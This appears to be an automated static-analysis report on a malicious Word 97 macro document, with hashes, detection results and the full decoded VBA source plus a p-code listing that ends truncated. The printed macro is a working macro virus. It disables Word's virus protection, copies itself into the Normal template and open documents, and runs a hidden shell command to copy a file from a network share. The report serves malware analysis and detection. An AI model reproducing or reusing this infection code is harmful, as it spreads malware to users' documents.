Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c99c543556eac38…

MALICIOUS

Office (OLE)

47.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b7631c17396680a79f80157ea48e4b53 SHA-1: 2c0ffc1a04e7b9f5ccbeac1f8550d7ec5f950f0b SHA-256: 7c99c543556eac3824e1031e20b9acc9f29c09245d98e1d50b88acfdf81c2731
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The macros attempt to copy a file named 'NetSetup.log' from a network share to the local system and then set this copied file as the system wallpaper. This behavior suggests an attempt to establish persistence or download and execute a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-9
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9953 bytes
SHA-256: 1fff0747537d285e7214430d260014ae89468422c04a5072272a376894ea13de
Detection
ClamAV: Doc.Trojan.Marker-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.WindowState = wdWindowStateMinimize

Const Kuku = "Black Wednesday!"

'Declare Variables
Dim SaveDoc, SaveNormalTempl, DocInfected, NormalTemplInfected As Boolean
Dim ActDoc, NormTempl As Object
Dim MyCod, UserAddress, LogData, LogFile As String
Dim a1, FileLocal, FileServer As Integer

'Initialize Variables
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTempl = NormalTemplate.VBProject.VBComponents.Item(1)

DocInfected = ActDoc.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
NormalTemplInfected = NormTempl.CodeModule.Find(Kuku, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False

Set fs = Application.FileSearch
With fs
    .LookIn = "C:\"
    .FileName = "NetSetup.log"
    FileLocal = .Execute
End With
With fs
    .LookIn = "\\post\temp\1000"
    .FileName = "NetSetup.log"
    FileServer = .Execute
End With
    
If FileServer > 0 Then
    If (FileLocal <= 0) Then
        Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
    Else
        If FileLen("\\post\temp\1000\NetSetup.log") <> FileLen("c:\NetSetup.log") Then
            Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
        End If
    End If
End If

System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"

'If (WeekDay(Now()) = vbWednesday) Then
    Selection.MoveDown Unit:=wdLine, Count:=20, Extend:=wdExtend
    Selection.Range.Case = wdNextCase
    ActiveDocument.Save
'End If
'Make sure that some conditions are true before we continue infecting anything
If (DocInfected = True Xor NormalTemplInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocInfected = True Then
  
    SaveNormalTempl = NormalTemplate.Saved
  
    MyCod = ActDoc.CodeModule.Lines(1, ActDoc.CodeModule.CountOfLines)

    a1 = NormTempl.CodeModule.CountOfLines
    NormTempl.CodeModule.DeleteLines 1, a1
    NormTempl.CodeModule.AddFromString MyCod
    
    If SaveNormalTempl = True Then NormalTemplate.Save
    
  End If
              
  'Infect the ActiveDocument
  If NormalTemplInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDoc = ActiveDocument.Saved
    
    OurCode = NormTempl.CodeModule.Lines(1, NormTempl.CodeModule.CountOfLines)

    a1 = ActDoc.CodeModule.CountOfLines
    ActDoc.CodeModule.DeleteLines 1, a1
    ActDoc.CodeModule.AddFromString OurCode
    
    If SaveDoc = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub














' Processing file: /opt/analyzer/scan_staging/2e3209c56e084d8e96203cce10096b5d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9230 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #4:
' 	Ld wdWindowStateMinimize 
' 	Ld ActiveWindow 
' 	MemSt WindowState 
' Line #5:
' Line #6:
' 	Dim (Const) 
' 	LitStr 0x0010 "Black Wednesday!"
' 	VarDefn Kuku
' Line #7:
' Line #8:
' 	QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #9:
' 	Dim 
' 	VarDefn SaveDoc
' 	VarDefn SaveNormalTempl
' 	VarDefn DocInfected
' 	VarDefn NormalTemplInfected (As Boolean)
' Line #10:
' 	Dim 
' 	VarDefn ActDoc
' 	VarDefn NormTempl (As Object)
' Line #11:
' 	Dim 
' 	VarDefn MyCod
' 	VarDefn UserAddress
' 	VarDefn LogData
' 	VarDefn LogFi
... (truncated)